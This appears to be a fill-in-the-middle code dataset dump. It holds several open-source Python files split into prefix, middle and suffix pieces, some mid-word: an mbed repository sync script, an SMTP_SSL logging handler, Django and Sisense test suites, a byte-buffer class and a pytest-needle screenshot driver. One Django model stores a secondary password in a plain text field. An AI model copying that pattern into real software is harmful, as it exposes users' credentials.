repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
| prefix
stringlengths 0
8.16k
| middle
stringlengths 3
512
| suffix
stringlengths 0
8.17k
|
|---|---|---|---|---|---|---|---|---|
bikeNomad/mbed
|
workspace_tools/synch.py
|
Python
|
apache-2.0
| 11,453
| 0.005413
|
"""
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
One repository to update them all
On mbed.org the mbed SDK is split up in multiple repositories, this script takes
care of updating them all.
"""
import sys
from copy import copy
from os import walk, remove, makedirs
from os.path import join, abspath, dirname, relpath, exists, isfile
from shutil import copyfile
from optparse import OptionParser
import re
import string
ROOT = abspath(join(dirname(__file__), ".."))
sys.path.insert(0, ROOT)
from workspace_tools.settings import MBED_ORG_PATH, MBED_ORG_USER, BUILD_DIR
from workspace_tools.paths import *
from workspace_tools.utils import run_cmd
MBED_URL = "mbed.org"
MBED_USER = "mbed_official"
changed = []
push_remote = True
quiet = False
commit_msg = ''
# Code that does have a mirror in the mbed SDK
# Tuple data: (repo_name, list_of_code_dirs, [team])
# team is optional - if not specified, the code is published under mbed_official
OFFICIAL_CODE = (
("mbed-dev" , MBED_BASE),
("mbed-rtos", RTOS),
("mbed-dsp" , DSP),
("mbed-rpc" , MBED_RPC),
("lwip" , LWIP_SOURCES+"/lwip"),
("lwip-sys", LWIP_SOURCES+"/lwip-sys"),
("Socket" , LWIP_SOURCES+"/Socket"),
("lwip-eth" , ETH_SOURCES+"/lwip-eth"),
("EthernetInterface", ETH_SOURCES+"/EthernetInterface"),
("USBDevice", USB),
("USBHost" , USB_HOST),
("CellularModem", CELLULAR_SOURCES),
("CellularUSBModem", CELLULAR_USB_SOURCES),
("UbloxUSBModem", UBLOX_SOURCES),
("UbloxModemHTTPClientTest", [TEST_DIR+"/net/cellular/http/common", TEST_DIR+"/net/cellular/http/ubloxusb"]),
("UbloxModemSMSTest", [TEST_DIR+"/net/cellular/sms/common", TEST_DIR+"/net/cellular/sms/ubloxusb"]),
("FATFileSystem", FAT_FS, "mbed-official"),
)
# Code that does have dependencies to libraries should point to
# the latest revision. By default, they point to a specific revision.
CODE_WITH_DEPENDENCIES = (
# Libraries
"Ethernet
|
Interface",
# RTOS Examples
"rtos_basic",
"rtos_isr",
"rtos_mail",
"rtos_mutex",
"rtos_queue",
"rtos_semaphore",
"rtos_signals",
"rtos_timer",
|
# Net Examples
"TCPEchoClient",
"TCPEchoServer",
"TCPSocket_HelloWorld",
"UDPSocket_HelloWorld",
"UDPEchoClient",
"UDPEchoServer",
"BroadcastReceive",
"BroadcastSend",
# mbed sources
"mbed-src-program",
)
# A list of regular expressions that will be checked against each directory
# name and skipped if they match.
IGNORE_DIRS = (
)
IGNORE_FILES = (
'COPYING',
'\.md',
"\.lib",
"\.bld"
)
def ignore_path(name, reg_exps):
for r in reg_exps:
if re.search(r, name):
return True
return False
class MbedRepository:
@staticmethod
def run_and_print(command, cwd):
stdout, _, _ = run_cmd(command, wd=cwd, redirect=True)
print(stdout)
def __init__(self, name, team = None):
self.name = name
self.path = join(MBED_ORG_PATH, name)
if team is None:
self.url = "http://" + MBED_URL + "/users/" + MBED_USER + "/code/%s/"
else:
self.url = "http://" + MBED_URL + "/teams/" + team + "/code/%s/"
if not exists(self.path):
# Checkout code
if not exists(MBED_ORG_PATH):
makedirs(MBED_ORG_PATH)
self.run_and_print(['hg', 'clone', self.url % name], cwd=MBED_ORG_PATH)
else:
# Update
self.run_and_print(['hg', 'pull'], cwd=self.path)
self.run_and_print(['hg', 'update'], cwd=self.path)
def publish(self):
# The maintainer has to evaluate the changes first and explicitly accept them
self.run_and_print(['hg', 'addremove'], cwd=self.path)
stdout, _, _ = run_cmd(['hg', 'status'], wd=self.path)
if stdout == '':
print "No changes"
return False
print stdout
if quiet:
commit = 'Y'
else:
commit = raw_input(push_remote and "Do you want to commit and push? Y/N: " or "Do you want to commit? Y/N: ")
if commit == 'Y':
args = ['hg', 'commit', '-u', MBED_ORG_USER]
if commit_msg:
args = args + ['-m', commit_msg]
self.run_and_print(args, cwd=self.path)
if push_remote:
self.run_and_print(['hg', 'push'], cwd=self.path)
return True
# Check if a file is a text file or a binary file
# Taken from http://code.activestate.com/recipes/173220/
text_characters = "".join(map(chr, range(32, 127)) + list("\n\r\t\b"))
_null_trans = string.maketrans("", "")
def is_text_file(filename):
block_size = 1024
def istext(s):
if "\0" in s:
return 0
if not s: # Empty files are considered text
return 1
# Get the non-text characters (maps a character to itself then
# use the 'remove' option to get rid of the text characters.)
t = s.translate(_null_trans, text_characters)
# If more than 30% non-text characters, then
# this is considered a binary file
if float(len(t))/len(s) > 0.30:
return 0
return 1
with open(filename) as f:
res = istext(f.read(block_size))
return res
# Return the line ending type for the given file ('cr' or 'crlf')
def get_line_endings(f):
examine_size = 1024
try:
tf = open(f, "rb")
lines, ncrlf = tf.readlines(examine_size), 0
tf.close()
for l in lines:
if l.endswith("\r\n"):
ncrlf = ncrlf + 1
return 'crlf' if ncrlf > len(lines) >> 1 else 'cr'
except:
return 'cr'
# Copy file to destination, but preserve destination line endings if possible
# This prevents very annoying issues with huge diffs that appear because of
# differences in line endings
def copy_with_line_endings(sdk_file, repo_file):
if not isfile(repo_file):
copyfile(sdk_file, repo_file)
return
is_text = is_text_file(repo_file)
if is_text:
sdk_le = get_line_endings(sdk_file)
repo_le = get_line_endings(repo_file)
if not is_text or sdk_le == repo_le:
copyfile(sdk_file, repo_file)
else:
print "Converting line endings in '%s' to '%s'" % (abspath(repo_file), repo_le)
f = open(sdk_file, "rb")
data = f.read()
f.close()
f = open(repo_file, "wb")
data = data.replace("\r\n", "\n") if repo_le == 'cr' else data.replace('\n','\r\n')
f.write(data)
f.close()
def visit_files(path, visit):
for root, dirs, files in walk(path):
# Ignore hidden directories
for d in copy(dirs):
full = join(root, d)
if d.startswith('.'):
dirs.remove(d)
if ignore_path(full, IGNORE_DIRS):
print "Skipping '%s'" % full
dirs.remove(d)
for file in files:
if ignore_path(file, IGNORE_FILES):
continue
visit(join(root, file))
def update_repo(repo_name, sdk_paths, team_name):
repo = MbedRepository(repo_name, team_name)
# copy files from mbed SDK to mbed_official repository
def visit_mbed_sdk(sdk_file):
repo_file = join(repo.path, relpath(sdk_file, sdk_path))
repo_dir = dirname(repo_file)
if not exists(repo_dir):
makedirs(repo_dir)
copy_with_line_endings(sdk_file, repo_file)
for sdk_path in sdk_paths:
visit_files(sdk_path, visit_mbed_sdk)
# remove repository files that do not exist in the mbed SDK
def visit_repo(repo_file):
for sdk_path in sdk_paths:
|
gary-dalton/Twenty47
|
twenty47/logging.py
|
Python
|
mit
| 3,990
| 0.003509
|
#!/usr/bin/env python
#
#
"""Test harness for the logging module. Tests BufferingSMTPHandler, an alternative implementation
of SMTPHandler.
Copyright (C) 2001-2002 Vinay Sajip. All Rights Reserved.
Modified to handle SMTP_SSL connections
"""
import string, logging, logging.handlers
from logging import Formatter
class BufferingSMTP_SSLHandler(logging.handlers.BufferingHandler):
'''
Modified to handle SMTP_SSL connections
'''
# Copyright 2001-2002 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereb
|
y granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name o
|
f Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
# This file is part of the Python logging distribution. See
# http://www.red-dove.com/python_logging.html
def __init__(self, server, port, username, password, fromaddr, toaddrs, subject, capacity):
logging.handlers.BufferingHandler.__init__(self, capacity)
self.fromaddr = fromaddr
self.toaddrs = toaddrs
self.subject = subject
self.mailhost = server
self.mailport = port
self.username = username
self.password = password
self.setFormatter(logging.Formatter("%(asctime)s %(levelname)-5s %(message)s"))
def flush(self):
if len(self.buffer) > 0:
try:
import smtplib
smtp = smtplib.SMTP_SSL(self.mailhost, self.mailport)
msg = "From: %s\r\nTo: %s\r\nSubject: %s\r\n\r\n" % (self.fromaddr, string.join(self.toaddrs, ","), self.subject)
for record in self.buffer:
s = self.format(record)
print s
msg = msg + s + "\r\n"
smtp.login(self.username, self.password)
smtp.sendmail(self.fromaddr, self.toaddrs, msg)
smtp.quit()
except:
self.handleError(None) # no particular record
self.buffer = []
'''
Set up logging
'''
if app.config['LOG_TO_FILE']:
file_handler = logging.handlers.RotatingFileHandler(
app.config['LOG_FILENAME'],
maxBytes=100000,
backupCount=5)
file_handler.setLevel(app.config['LOG_FILE_LEVEL'])
file_handler.setFormatter(Formatter(
'%(asctime)s %(levelname)s: %(message)s '
'[in %(pathname)s:%(lineno)d]'
))
app.logger.addHandler(file_handler)
if app.config['LOG_TO_EMAIL']:
mail_handler = BufferingSMTP_SSLHandler(
app.config['MAIL_SERVER'],
app.config['MAIL_PORT'],
app.config['MAIL_USERNAME'],
app.config['MAIL_PASSWORD'],
app.config['DEFAULT_MAIL_SENDER'],
app.config['LOG_EMAIL_TO'],
app.config['LOG_EMAIL_SUBJECT'],
0,
)
mail_handler.setLevel(logging.WARNING)
mail_handler.setFormatter(Formatter('''
Message type: %(levelname)s
Location: %(pathname)s:%(lineno)d
Module: %(module)s
Function: %(funcName)s
Time: %(asctime)s
Message:
%(message)s
'''))
app.logger.addHandler(mail_handler)
|
cfpb/porchlight
|
porchlightapi/tests.py
|
Python
|
cc0-1.0
| 12,039
| 0.004902
|
# -*- coding: utf-8 -*-
from django.test import TestCase
import mock
import datetime
from dateutil import tz
## Repository Test
from porchlightapi.models import Repository
# Constant values used for testing
UNDEPLOYED_VALUE_TUPLE = ('c9d2d5b79edd7d4acaf7172a98203bf3aee2586a',
datetime.datetime(year=1972, month=3, day=17, hour=8, minute=23, tzinfo=tz.tzutc()),
5)
DEPLOYED_VALUE_TUPLE = ('ba60a64b151e402a9f08f95710ec09db4649eb2e',
datetime.datetime(year=1972, month=2, day=29, hour=10, minute=45, tzinfo=tz.tzutc()),
2)
class RepositoryTestCase(TestCase):
def setUp(self):
# Create a repository object for us to test
Repository.objects.create(
url='https://github.com/cfpb/porchlight',
name='Porchlight',
project='System Tools',
deployed_value_source='porchlightapi.sources.random_source',
undeployed_value_source='porchlightapi.sources.random_source',
value_calculator='porchlightapi.sources.difference_value_calculator')
@mock.patch("porchlightapi.sources.random_source")
def test_undeployed_value_source(self, random_source):
"""
Test that the model's undeployed_value() function correctly
uses the lookup function to get and run the mock data source
function.
"""
random_source.return_value = UNDEPLOYED_VALUE_TUPLE
test_repo = Repository.objects.get(url='https://github.com/cfpb/porchlight')
undeployed_value_tuple = test_repo.undeployed_value()
self.assertEqual(undeployed_value_tuple[0], UNDEPLOYED_VALUE_TUPLE[0])
self.assertEqual(undeployed_value_tuple[1], UNDEPLOYED_VALUE_TUPLE[1])
self
|
.assertEqual(undeployed_value_tuple[2], UNDEPLOYED_VALUE_TUPLE[2])
@mock.patch("porchlightapi.sources.random_source")
def test_deployed_value_source(self, ran
|
dom_source):
"""
Test that the model's undeployed_value() function correctly
uses the lookup function to get and run the mock data source
function.
"""
random_source.return_value = DEPLOYED_VALUE_TUPLE
test_repo = Repository.objects.get(url='https://github.com/cfpb/porchlight')
deployed_value_tuple = test_repo.deployed_value()
self.assertEqual(deployed_value_tuple[0], DEPLOYED_VALUE_TUPLE[0])
self.assertEqual(deployed_value_tuple[1], DEPLOYED_VALUE_TUPLE[1])
self.assertEqual(deployed_value_tuple[2], DEPLOYED_VALUE_TUPLE[2])
@mock.patch("porchlightapi.sources.difference_value_calculator")
def test_value(self, difference_value_calculator):
"""
Test that the model's value() function correctly uses the lookup function
to get and run the value calculator function.
"""
difference_value_calculator.return_value = 3
test_repo = Repository.objects.get(url='https://github.com/cfpb/porchlight')
self.assertEqual(test_repo.value(UNDEPLOYED_VALUE_TUPLE, DEPLOYED_VALUE_TUPLE),
5 - 2)
## Value Data Points
from porchlightapi.models import ValueDataPointManager
class ValueDataPointManagerTestCase(TestCase):
@mock.patch('porchlightapi.models.ValueDataPoint')
def test_create_datapoint(self, ValueDataPoint):
"""
Test the ValueDataPointManager's creation of ValueDataPoint
objects from Repository objects. The manager should populate
the ValueDataPoint using the Repository's value methods, which
call the appropriate callables.
"""
# Create a mock repository to pass to the ValueDataPointManager
# create_datapoint() method with the appropriate return values.
mock_repository = mock.create_autospec(Repository)
mock_repository.undeployed_value.return_value = UNDEPLOYED_VALUE_TUPLE
mock_repository.deployed_value.return_value = DEPLOYED_VALUE_TUPLE
mock_repository.value.return_value = 3
# We want to test that the create_datapoint method extracts the correct
# values from the repository and calls the default create() method with
# those values.
objects = ValueDataPointManager()
objects.create = mock.MagicMock()
datapoint = objects.create_datapoint(mock_repository)
objects.create.assert_called_with(
repository=mock_repository,
undeployed_identifier=UNDEPLOYED_VALUE_TUPLE[0],
undeployed_datetime=UNDEPLOYED_VALUE_TUPLE[1],
undeployed_value=UNDEPLOYED_VALUE_TUPLE[2],
deployed_identifier=DEPLOYED_VALUE_TUPLE[0],
deployed_datetime=DEPLOYED_VALUE_TUPLE[1],
deployed_value=DEPLOYED_VALUE_TUPLE[2],
value=3)
## Test Data Sources
import datetime
from porchlightapi.sources import github_commit_source
from porchlightapi.sources import github_tag_source
from porchlightapi.sources import json_file_source
class GithubDataSourceTestCase(TestCase):
def setUp(self):
"""
Set up the mock request responses for Github.
"""
# Call to /repos/porchlight is only interested in size
self.mock_repo_response = mock.MagicMock()
self.mock_repo_response.json.return_value = {u'size': 1619,}
# Call to /repos/porchlight/branches/master is used to
# get last commit SHA and URL
self.mock_branches_response = mock.MagicMock()
self.mock_branches_response.json.return_value = {u'commit':
{u'sha': u'130df1874519c11a79ac4a2e3e6671a165860441',
u'url': u'https://api.github.com/repos/cfpb/porchlight/commits/130df1874519c11a79ac4a2e3e6671a165860441'}
}
# Call to /repos/porchlight/tags is used to get latest commit SHA and
# tag name
self.mock_tags_response = mock.MagicMock()
self.mock_tags_response.json.return_value = [{
u'commit':{u'sha':u'130df1874519c11a79ac4a2e3e6671a165860441'},
u'name':u'v0.1.0'
},]
self.mock_no_tags_response = mock.MagicMock()
self.mock_no_tags_response.json.return_value = [{
u'commit':{u'sha':u'130df1874519c11a79ac4a2e3e6671a165860441'},
u'name':u'atag'
},]
# Call to the commit itself /repos/porchlight/commits/130df1874519c11a79ac4a2e3e6671a165860441
# is used to get the date and file data
self.mock_commit_response = mock.MagicMock()
self.mock_commit_response.json.return_value = {
u'commit': {u'committer': {u'date': u'2015-01-26 21:44:20Z',},},
u'files':[
{'additions': 1, 'deletions': 2, 'changes':3},
{'additions': 4, 'deletions': 5, 'changes':6},
{'additions': 7, 'deletions': 8, 'changes':9},
]
}
self.test_date = datetime.datetime(year=2015, month=01, day=26, hour=21,
minute=44, second=20, tzinfo=tz.tzutc())
# A mock repository with a URL
self.mock_repository = mock.create_autospec(Repository)
self.mock_repository.url = 'https://github.com/cfpb/porchlight'
@mock.patch("requests.get")
def test_github_commit_source(self, mock_request_get):
# Test that our Github source function correctly constructs URLs by
# mocking requests.get()
# There should be 3 calls to request.get(), one for the repository (to
# get size), one for branches, and one for commits.
# XXX: Because we're not using the repo size, it's been commented out to
# reduce API hits.
mock_request_get.side_effect = [
# self.mock_repo_response,
self.mock_branches_response,
self.mock_commit_response
]
source_tuple = github_commit_source(self.mock_repository)
self.assertEqual(source_tuple[0], '130df1874519c11a79ac4a2e3e6671a165860441')
self.assertEqual(source_tuple[1], self.test_date)
self.assertEqual(source_tuple[2], 15)
@mock.patch("requests.get")
def test_
|
AnythingTechPro/curionet
|
curionet/io.py
|
Python
|
apache-2.0
| 3,368
| 0.001485
|
"""
* Copyright (C) Caleb Marshall and others... - All Rights Reserved
* Written by Caleb Marshall <anythingtechpro@gmail.com>, May 27th, 2017
* Licensing information can foun
|
d in 'LICENSE', which is part of this source code package.
"""
import struct
class Endianness(object):
"""
A enum that stores network endianess formats
"""
NATIVE = '='
LITTLE_ENDIAN = '<'
BIG_ENDIAN = '>'
NETWORK = '!'
class DataBufferError(IOError):
"""
A data buffer specific io error
"""
class DataBufferIO(object):
"""
A class for manipulating (reading and/or writing) an array of bytes
|
"""
BYTE_ORDER = Endianness.NETWORK
def __init__(self, data=bytes(), offset=0):
self.data = data
self.offset = offset
@property
def byte_order(self):
return self.BYTE_ORDER
@property
def remaining(self):
return self.data[self.offset:]
def read(self, length):
data = self.remaining[:length]
self.offset += length
return data
def write(self, data):
if not data:
return
self.data += data
def clear(self):
self.data = bytes()
self.offset = 0
def read_from(self, fmt):
data = struct.unpack_from(self.byte_order + fmt, self.data, self.offset)
self.offset += struct.calcsize(fmt)
return data
def write_to(self, fmt, *args):
self.write(struct.pack(self.byte_order + fmt, *args))
def read_byte(self):
return self.read_from('b')[0]
def write_byte(self, value):
self.write_to('b', value)
def read_ubyte(self):
return self.read_from('B')[0]
def write_ubyte(self, value):
self.write_to('B', value)
def read_bool(self):
return self.read_from('?')[0]
def write_bool(self, value):
self.write_to('?', value)
def read_short(self):
return self.read_from('h')[0]
def write_short(self, value):
self.write_to('h', value)
def read_ushort(self):
return self.read_from('H')[0]
def write_ushort(self, value):
self.write_to('H', value)
def read_int(self):
return self.read_from('i')[0]
def write_int(self, value):
self.write_to('i', value)
def read_uint(self):
return self.read_from('I')[0]
def write_uint(self, value):
self.write_to('I', value)
def read_long(self):
return self.read_from('l')[0]
def write_long(self, value):
self.write_to('l', value)
def read_ulong(self):
return self.read_from('L')[0]
def write_ulong(self, value):
self.write_to('L', value)
def read_long_long(self):
return self.read_from('q')[0]
def write_long_long(self, value):
self.write_to('q', value)
def read_ulong_long(self):
return self.read_from('Q')[0]
def write_ulong_long(self, value):
self.write_to('Q', value)
def read_float(self):
return self.read_from('f')[0]
def write_float(self, value):
self.write_to('f', value)
def read_double(self):
return self.read_from('d')[0]
def write_double(self, value):
self.write_to('d', value)
def read_char(self):
return self.read_from('s')[0]
def write_char(self, value):
self.write_to('s', value)
|
GoogleCloudPlatform/datacatalog-connectors-bi
|
google-datacatalog-sisense-connector/tests/google/datacatalog_connectors/sisense/prepare/assembled_entry_factory_test.py
|
Python
|
apache-2.0
| 13,804
| 0
|
#!/usr/bin/python
#
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from unittest import mock
from typing import Any, Dict
from google.cloud import datacatalog
from google.datacatalog_connectors.commons import prepare as commons_prepare
from google.datacatalog_connectors.sisense import prepare
class AssembledEntryFactoryTest(unittest.TestCase):
__PREPARE_PACKAGE = 'google.datacatalog_connectors.sisense.prepare'
__FACTORY_MODULE = f'{__PREPARE_PACKAGE}.assembled_entry_factory'
__FACTORY_CLASS = f'{__FACTORY_MODULE}.AssembledEntryFactory'
__PRIVATE_METHOD_PREFIX = f'{__FACTORY_CLASS}._AssembledEntryFactory'
@mock.patch(f'{__PREPARE_PACKAGE}.datacatalog_tag_factory'
f'.DataCatalogTagFactory')
@mock.patch(f'{__FACTORY_MODULE}.datacatalog_entry_factory'
f'.DataCatalogEntryFactory')
def setUp(self, mock_entry_factory, mock_tag_factory):
self.__factory = prepare.AssembledEntryFactory(
project_id='test-project',
location_id='test-location',
entry_group_id='test-entry-group',
user_specified_system='test-system',
server_address='https://test.server.com')
self.__mock_entry_factory = mock_entry_factory.return_value
self.__mock_tag_factory = mock_tag_factory.return_value
def test_constructor_should_set_instance_attributes(self):
attrs = self.__factory.__dict__
self.assertEqual(
self.__mock_entry_factory,
attrs['_AssembledEntryFactory__datacatalog_entry_factory'])
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}'
f'__make_assembled_entries_for_folder')
def test_make_assembled_entries_list_should_process_folders(
self, mock_make_assembled_entries_for_folder):
folder = self.__make_fake_folder()
mock_make_assembled_entries_for_folder.return_value = \
[commons_prepare.AssembledEntryData('test-folder', {})]
assembled_entries = self.__factory.make_assembled_entries_list(
folder, {})
self.assertEqual(1, len(assembled_entries))
mock_make_assembled_entries_for_folder.assert_called_once()
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}'
f'__make_assembled_entries_for_dashboard')
def test_make_assembled_entries_list_should_process_dashboards(
self, mock_make_assembled_entries_for_dashboard):
dashboard = self.__make_fake_dashboard()
mock_make_assembled_entries_for_dashboard.return_value = \
[commons_prepare.AssembledEntryData('test-dashboard', {})]
assembled_entries = self.__factory.make_assembled_entries_list(
dashboard, {})
self.assertEqual(1, len(assembled_entries))
mock_make_assembled_entries_for_dashboard.assert_called_once()
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}__make_assembled_entry_for_folder')
def test_make_assembled_entries_for_folder_should_process_folder(
self, mock_make_assembled_entry_for_folder):
folder = self.__make_fake_folder()
tag_templates_dict = {}
assembled_entries = self.__factory\
._AssembledEntryFactory__make_assembled_entries_for_folder(
folder, tag_templates_dict)
self.assertEqual(1, len(assembled_entries))
mock_make_assembled_entry_for_folder.assert_called_once_with(
folder, tag_templates_dict)
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}__make_assembled_entry_for_folder')
def test_make_assembled_entries_for_folder_should_process_child_folders(
self, mock_make_assembled_entry_for_folder):
child_folder = self.__make_fake_folder()
parent_folder = self.__make_fake_folder()
parent_folder['folders'] = [child_folder]
tag_templates_dict = {}
assembled_entries = self.__factory\
._AssembledEntryFactory__make_assembled_entries_for_folder(
parent_folder, tag_templates_dict)
self.assertEqual(2, len(assembled_entries))
self.assertEqual(2, mock_make_assembled_entry_for_folder.call_count)
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}'
f'__make_assembled_entry_for_dashboard')
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}__make_assembled_entry_for_folder')
def test_make_assembled_entries_for_folder_should_process_nested_dashboards( # noqa: E501
self, mock_make_assembled_entry_for_folder,
mock_make_assembled_entry_for_dashboard):
dashboard = self.__make_fake_dashboard()
folder = self.__make_fake_folder()
folder['dashboards'] = [dashboard]
tag_templates_dict = {}
assembled_entries = self.__factory\
._AssembledEntryFactory__make_assembled_entries_for_folder(
folder, tag_templates_dict)
self.assertEqual(2, len(assembled_entries))
mock_make_assembled_entry_for_folder.assert_called_once_with(
folder, tag_templates_dict)
mock_make_assembled_entry_for_dashboard.assert_called_once_with(
dashboard, tag_templates_dict)
def test_make_assembled_entry_for_folder_should_make_entry_and_tags(self):
folder = self.__make_fake_folder()
tag_template = datacatalog.TagTemplate()
tag_template.name = 'tagTemplates/sisense_folder_metadata'
tag_templates_dict = {'sisense_folder_metadata': tag_template}
fake_entry = ('test-folder', {})
entry_factory = self.__mock_entry_factory
entry_factory.make_entry_for_folder.return_value = fake_entry
fake_tag = datacatalog.Tag()
|
fake_tag.template = 'tagTemplates/sisense_folder_metadata'
tag_factory = self.__mock_tag_factory
tag_factory.make_tag_for_folder.return_value = fake_tag
assembled_entry = self.__factory\
._AssembledEntryFactory__make_assembled_entry_for_folder(
folder, tag_templates_dict)
self.assertEqual('test-folder', assembled_entry.entry_id)
self.assertEqual({}, assembled_entry.entry)
entry_factory.make_entry_for_folder.a
|
ssert_called_once_with(folder)
tags = assembled_entry.tags
self.assertEqual(1, len(tags))
self.assertEqual('tagTemplates/sisense_folder_metadata',
tags[0].template)
tag_factory.make_tag_for_folder.assert_called_once_with(
tag_template, folder)
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}'
f'__make_assembled_entry_for_dashboard')
def test_make_assembled_entries_for_dashboard_should_process_dashboard(
self, mock_make_assembled_entry_for_dashboard):
dashboard = self.__make_fake_dashboard()
tag_templates_dict = {}
assembled_entries = self.__factory\
._AssembledEntryFactory__make_assembled_entries_for_dashboard(
dashboard, tag_templates_dict)
self.assertEqual(1, len(assembled_entries))
mock_make_assembled_entry_for_dashboard.assert_called_once_with(
dashboard, tag_templates_dict)
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}__make_assembled_entry_for_widget')
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}'
f'__make_assembled_entry_for_dashboard')
def test_make_assembled_entries_for_dashboard_should_process_nested_widgets( # noqa: E501
self, mock_make_assembled_entry_for_dashboard,
mock_make_assembled_entry_for_widget):
widget = self.__make_fake_widget()
dashboard = self.__make_fake_dashboard()
dashboard['widgets'] = [widget]
|
Titulacion-Sistemas/PracticasDjango
|
usuarios_logueados/usuarios/models.py
|
Python
|
gpl-2.0
| 791
| 0.011378
|
from django import forms
from django.contrib.auth.models import User
from django.forms import ModelForm
from django.db import models
# Create your models here.
#EDICION DE MODELO USER
User.add_to_class('usuario_sico', models.CharField(max_length=10, null=False, blank=False))
User.add_to_class('contrasenia_sico', models.CharField(max_length=10, null=False, blank=False))
#User.add_to_class('amigos', models.ManyToManyField('self', symmetrical=True, bla
|
nk=True))
#FORMULARIOS
class SignUpForm(ModelForm):
class Meta:
model = User
|
fields = ['username', 'password', 'email', 'first_name', 'last_name', 'usuario_sico', 'contrasenia_sico']
widgets = {
'password': forms.PasswordInput(),
'contrasenia_sico': forms.PasswordInput(),
}
|
jlane9/pytest-needle
|
pytest_needle/driver.py
|
Python
|
mit
| 13,087
| 0.00214
|
"""pytest_needle.driver
.. codeauthor:: John Lane <jlane@fanthreesixty.com>
"""
import base64
from errno import EEXIST
import math
import os
import re
import sys
import pytest
from needle.cases import import_from_string
from needle.engines.pil_engine import ImageDiff
from PIL import Image, ImageDraw, ImageColor
from selenium.webdriver.remote.webdriver import WebElement
from pytest_needle.exceptions import ImageMismatchException, MissingBaselineException, MissingEngineException
if sys.version_info >= (3, 0):
from io import BytesIO as IOClass
# Ignoring since basetring is not redefined if running on python3
basestring = str # pylint: disable=W0622,C0103
else:
try:
from cStringIO import StringIO as IOClass
except ImportError:
from StringIO import StringIO as IOClass
DEFAULT_BASELINE_DIR = os.path.realpath(os.path.join(os.getcwd(), 'screenshots', 'baseline'))
DEFAULT_OUTPUT_DIR = os.path.realpath(os.path.join(os.getcwd(), 'screenshots'))
DEFAULT_ENGINE = 'needle.engines.pil_engine.Engine'
DEFAULT_VIEWPORT_SIZE = '1024x768'
class NeedleDriver(object): # pylint: disable=R0205
"""NeedleDriver instance
"""
ENGINES = {
'pil': DEFAULT_ENGINE,
'imagemagick': 'needle.engines.imagemagick_engine.Engine',
'perceptualdiff': 'needle.engines.perceptualdiff_engine.Engine'
}
def __init__(self, driver, **kwargs):
self.options = kwargs
self.driver = driver
# Set viewport position, size
self.driver.set_window_position(0, 0)
self.set_viewport()
@staticmethod
def _create_dir(directory):
"""Recursively create a directory
.. note:: From needle
https://github.com/python-needle/needle/blob/master/needle/cases.py#L125
:param str directory: Directory path to create
:return:
"""
try:
os.makedirs(directory)
except OSError as err:
if err.errno == EEXIST and os.path.isdir(directory):
return
raise err
def _find_element(self, element_or_selector=None):
"""Returns an element
:param element_or_selector: WebElement or tuple containing selector ex. ('id', 'mainPage')
:return:
"""
if isinstance(element_or_selector, tuple): # pylint: disable=R1705
elements = self.driver.find_elements(*element_or_selector)
return elements[0] if elements else None
elif isinstance(element_or_selector, WebElement):
return element_or_selector
raise ValueError("element_or_selector must be a WebElement or tuple selector")
@staticmethod
def _get_element_dimensions(element):
"""Returns an element's position and size
:param WebElement element: Element to get dimensions for
:return:
"""
if isinstance(element, WebElement):
# Get dimensions of element
location = element.location
size = element.size
return {
'top': int(location['y']),
'left': int(location['x']),
'width': int(size['width']),
'height': int(size['height'])
}
raise ValueError("element must be a WebElement")
def _get_element_rect(self, element):
"""Returns the two points that define the rectangle
:param WebElement element: Element to get points for
:return:
"""
dimensions = self._get_element_dimensions(element)
if dimensions:
return (
dimensions['left'],
dimensions['top'],
(dimensions['left'] + dimensions['width']),
(dimensions['top'] + dimensions['height'])
)
return ()
@staticmethod
def _get_ratio(image_size, window_size):
return max((
math.ceil(image_size[0] / float(window_size[0])),
math.ceil(image_size[1] / float(window_size[1]))
))
def _get_window_size(self):
window_size = self.driver.get_window_size()
return window_size['width'], window_size['height']
@property
def baseline_dir(self):
"""Return baseline image path
:return:
:rtype: str
"""
return self.options.get('baseline_dir', DEFAULT_BASELINE_DIR)
@baseline_dir.setter
def baseline_dir(self, value):
"""Set baseline image directory
:param str value: File path
:return:
"""
assert isinstance(value, basestring)
self.options['baseline_dir'] = value
@property
def cleanup_on_success(self):
"""Returns True, if cleanup on success flag is set
:return:
:rtype: bool
"""
return self.options.get('cleanup_on_success', False)
@cleanup_on_success.setter
def cleanup_on_success(self, value):
"""Set cleanup on success flag
